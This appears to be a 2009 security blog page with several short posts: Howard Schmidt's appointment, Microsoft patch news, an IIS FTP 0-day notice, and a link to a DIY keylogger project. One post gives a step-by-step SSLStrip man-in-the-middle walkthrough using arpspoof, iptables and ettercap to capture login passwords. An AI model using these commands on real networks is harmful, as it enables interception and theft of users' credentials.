SecurityWire Blog » Security News

Howard Schmidt as cybersecurity coordinator

merc — Thu, 24 Dec 2009 05:47:07 +0000

There has been a lot of chatter around Howard Schmidt being picked as cybersecurity “czar” at the white house this week and I just wanted to throw my two cents in. I recently had the opportunity to hear Mr. Schmidt speak at the central ohio infosec summit 2009 and I can attest that Howard is a very sharp guy. I believe Mr. Schmidt both posses the business and technical skills required with his new high level position at the white house. Howard has demonstrated both deep level understanding in business and technical issue surrounding information security and I am looking forward to see the changes he will introduce to in the next few years. To put it simply Howard is a security geek with an acute business sense.

Having Fun with SSLStrip

ospf5 — Thu, 26 Nov 2009 03:43:44 +0000

Intro

Ettercap was a very nice and easy way to sniff passwords and it still is for the most part. A recent issue has been the fact that the popular browsers have made their warnings about SSL certificates a little more scary. The old warnings looked harmless, the sheep would just click yes and the wolf would then have access to their paypal account. The newer warnings are a little more scary but from what I’ve seen aren’t much of a deterrent to the clicktards out there it will be rare that they know they’re being sniffed. When doing a pentest we want passwords of the network administrators not of the lowly sheep. Most network admins are at least a little security aware
Problem: Newer versions of popular webbrowsers have better warnings for SSL Certificate errors. This helps advanced users become aware that there may be a MITM attack going on. Most “clicktards” will ignore these warnings anyway and relinquish their logons to you but we want Network Admin passwords in our pentest.

Solution: Use SSL Strip. This will strip off all SSL information and pass the page to the victim as HTTP not HTTPS so no warning and only the most astute and paranoid users will notice this.

My lab is as follows. BackTrack 4 live and a windows XP machine which will be my victim.

Here is what I did step by step in BT4 Live boot to get this to work.

1. Start networking on BT4

/etc/init.d/networking start

2. Enable ipv4 forewarding

echo “1″ > /proc/sys/net/ipv4/ip_forward

3. Create an iptables rule to foreward traffic destined for port 80 to the port used by sslstrip which is 10000 by default

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

4. Now we need to start arpspoof to poision the victims arptable

arpspoof -i eth0 -t

5. now we start sslstrip with the -a switch

sslstrip -a

6. next we need to start ettercap

ettercap -T -q -i eth0

7. wait for someone to logon and grab their password!!

IIS FTP remote stack overflow 0-day

merc — Mon, 31 Aug 2009 20:42:43 +0000

A new 0-day exploit has been posted on milworm at http://milw0rm.com/exploits/9541 The new 0-day is for microsoft IIS 5’s (windows 2000) FTP service. Also claimed to work on IIS 6 (windows 2003) with stack cookie protection enabled. Metasploit development is already underway to integrate this new exploit.

HNN The Hacker News Network

merc — Sat, 25 Jul 2009 04:55:27 +0000

If you have been around the security scene for a while then you should well remember HNN the hacker news network and Space Rogue from the l0pht heavy industries. After quite a few years of down time, it looks like Space Rogue now has a new video newscast for this week and is planning for a full launch on 01/11/10. . HNN was always a good source of the latest news in the security world and will be quite refreshing to see what they have in store for us this time around! The new video format for HNN should be interesting. Check out there web site and be ready for the return!

The Hacker News Network.

IE and Visual Studio out of band patch from Microsoft next Tuesday

merc — Sat, 25 Jul 2009 03:34:20 +0000

Out of band release from Microsoft coming next Tuesday for Visual Studio with extra protection of the source issue in IE. They will be patching a few critical extra holes in IE at the same time. No details yet as to what issues are going to be patched. Most likely they will be significant and possibly already being exploited since Microsoft has not been deviating much for their patch Tuesday schedule recently. They hint that customers that are already up to date with security updates are not vulnerable to known attack so this could be more about fixing the source of a known issue to prevent exploitation from other attack vectors. The bulletin points out that developers will have to keep an eye out for any applications that use this vulnerable functionality and take action to mitigate this risk.

Keep an eye on the buletin at: http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx

KeeLog – DIY hardware PS/2 wireless keylogger

merc — Sun, 19 Jul 2009 04:17:41 +0000

KeeLog has nice online article on how to build a hardware ps/2 wireless keylogger. Sounds like a fun project and maybe someday I’ll have time to tackle it. The article comes with full instructions on how to build the transmitter and receiver. They also include a windows driver to make the receiver act as a virtual COM port so data can be monitored using any standard terminal application that supports serial ports.